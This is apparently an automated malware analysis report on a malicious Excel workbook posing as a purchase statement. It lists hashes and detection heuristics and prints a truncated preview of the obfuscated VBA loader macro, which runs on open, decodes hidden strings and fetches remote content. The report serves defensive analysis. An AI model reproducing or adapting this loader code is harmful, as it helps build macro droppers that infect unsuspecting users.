Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 17d72b64168aa3e1…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2010-07-22 03:25:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-26
MD5: 6e5f1c47f891f07a0584bbb53b0910ee SHA-1: 5bef5ed05874c92400cb1f0aea59c620f5b9f614 SHA-256: 17d72b64168aa3e10914de09e19c3730bb1989ff5810f3acc3c4c385cec4fca0
228 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an Excel document with a Workbook_Open macro that attempts to obfuscate its execution using CreateObject and custom decoding functions. The macro's primary function appears to be downloading and executing a second-stage payload, as indicated by the critical heuristic 'Obfuscated auto-exec VBA loader' and the use of CreateObject. The document body presents a lure of a 'Purchase Statement' to encourage users to enable macros, which is a common social engineering tactic.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7260 bytes
SHA-256: 09b9fc288151120a9a004573a351c651efd574173e82281b5b3474e2cd7f6159
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call l1ll
End Sub
Private Sub l1ll()
Call l1ll1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Option Explicit
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal l1ll11 As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal l1ll11 As Long)
#End If
Sub l1ll1()
Dim l1ll11, l1l11l
Set l1ll11 = CreateObject(l1l11("lsusddcfbc", "SG/x>Hby4+vA<3"))
Set l1ll11 = CreateObject(l1l11("wnceiliubn", "`{D3>?}KB#:<Un:s68|K6E,0"))
Set l1ll11 = CreateObject(l1l11("hrikyehrap", "Z""!>L>B;^v:@=4"))
If l1l1(l1ll11, l1lll(l111l(l1l11("nobfnafogm", "h,>F;CD:IA/8")))) Then
MsgBox l1l11("cekttifckn", "V22L#B@VL;A?HTJ@A15@@HD1I8,9=F%GM54G?.GMaE#,@5O4P/.9L5@M<:0B54.?J7?6IH.>6IK$9L=63/F*=J@BM<E02V+>2G>;2%DZ<G/>1872X"), vbOKOnly, l1l11("spbfpzbpft", "''3><GIE?>V|R-<?")
Else
MsgBox l1l11("hgrpufiyfu", "~z;I/J5H@B6:EPS7?$132RJCF.<EF3:@C%D;G.>FgK!1AMN)M&>BIAHB..7701*HA522<:8DHFA4EU*K,%6:1R@9FBK.7WC='D5K/1LO.;63,53;O"), vbOKOnly, l1l11("qisnwriapp", "kz@.4?C@5NIr:)>F")
End If
End Sub
Function l111l(ByVal l1ll1l)
Dim l1ll11, l111ll
l111ll = Replace(l1l11("gvhcdcllkl", "GjXiABt]V43J`B6A,J.;9>>;@6E13G`+?:b;274E+(57.<:V(5,-8?3j^XP?4,I[D-@5c:Q@"), l1l11("oyrifykudz", "]h"), l1l11("rxeepxfwqn", "D["))
If (IsNull(l1ll1l) = False) And (IsNull(l1l1l(Replace(l111ll, l1l11("cnrlqghjsw", "xcch"), l1l11("yixlygkplm", "r:@9")))) = False) Then
l1ll11 = l1l1l(Replace(l111ll, l1l11("ezhjnereml", "_pm_"), l1l11("afcicyomvn", "{:7;")))
l1ll11 = Replace(l1ll11, l1l11("rxeepxfwqn", "Gl"), l1l11("wbfhvlfbgy", "tN"))
l1ll11 = Replace(l1ll11, l1l11("nobfnafogm", "jF"), l1l11("zvqazlmeuj", "K*"))
l1ll11 = Replace(l1ll11, l1l11("nvplfuuuip", "?M"), l1l11("rxeepxfwqn", "(! wtp""u"))
Else
MsgBox l1l11("orqhzwayvh", "v'+Q*?>J8CAI;_OC@./?:UBAR>;F7D8CB.9=<.38PW*=<IN'?622Q<=K0&8B?'9DM6<0HB;<FRQ3FF;I/$?/3G@.8+W7CR?=%6E?7,AX037>;+B7["), vbOKOnly, l1l11("lqvyxwqxre", "u(66:A7F(ITjL.;0")
End If
l111l = l1ll11
End Function
Function l1l1l(l1l1ll)
Dim l1ll1l, l1llll
Set l1ll1l = CreateObject(l1l11("dzmockkywr", "Ew$2|sl[(}!m$$"""))
l1ll1l.Open l1l11("axteqyeowo", "]pmx"), l1l1ll, False
l1ll1l.send
If l1ll1l.Status = 200 Then
l1llll = l1ll1l.ResponseText
l1l1l = l1llll
Else
MsgBox l1l11("mgohwhauam", "u%9Q)J'X:;JKKPN:A&-F9G6CE3D?HA7@U9D>E*IMZWz79<J.H(,@Q;H4>(0KA7*CD74.OA-0HEF<?W8H,7J:4P<DM5W(=O29,?797+LA>5/G=;36R"), vbOKOnly, l1l11("wwyacgywtc", "g(?'?D;B17E{D&<A")
End If
End Function
Function l11l()
Dim l11111 As Variant
Dim l1lll1 As Long
Dim l11lll As String
Dim l11ll1 As Integer
l11ll1 = 10
l11111 = Array(l1l11("orqhzwayvh", "q1"), l1l11("ncufqnzqri", "+."), l1l11("gvhcdcllkl", "T7"), l1l11("wnceiliubn", "+;"), l1l11("oolizengtt", "_+"), l1l11("mgohwhauam", "{4"), l1l11("lqvyxwqxre", ".B"), l1l11("izqvowxkdx", "a5"), l1l11("oyrifykudz", "E4"), l1l11("zvqazlmeuj", "Q8"), _
l1l11("yohxflvqnd", "n2"), l1l11("lqvyxwqxre", "bG"), l1l11("abnfuueqsy", "NG"), l1l11("wnceiliubn", "wE"), l1l11("mrsxruhgym", "eH"), l1l11("dpihdiipaz", "eI"), l1l11("rrnvicebjm", "N?"), l1l11("ezhjnereml", "<L"), l1l11("cekttifckn", "TN"), l1l11("ucbkagbrwd", "k@"), l1l11("ucbkagbrwd", "VA"), l1l11("ouwldbbeja", "yG"), l1l11("ncufqnzqri", "vC"), l1l11("wbfhvlfbgy", ".N"), _
l1l11("cekttifckn", "jT"), l1l11("owerjznwwc", "tS"), l1l11("kvgrasitph", "W^"), l1l11("lsusddcfbc", "Vg"), l1l11("msrnlxbels", "`k"), l1l11("oyrifykudz", "R]"), l1l11("nvplfuuuip", "G\"), l1l11("gvhcdcllkl", "Ih"), l1l11("gvhcdcllkl", "Ui"), l1l11(
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 27136 bytes
SHA-256: e41344581119cda4ec0caf00f467d95e909facb2a47254278d86fd050dbfd077

Open this report in the interactive analyzer, or submit your own file for analysis.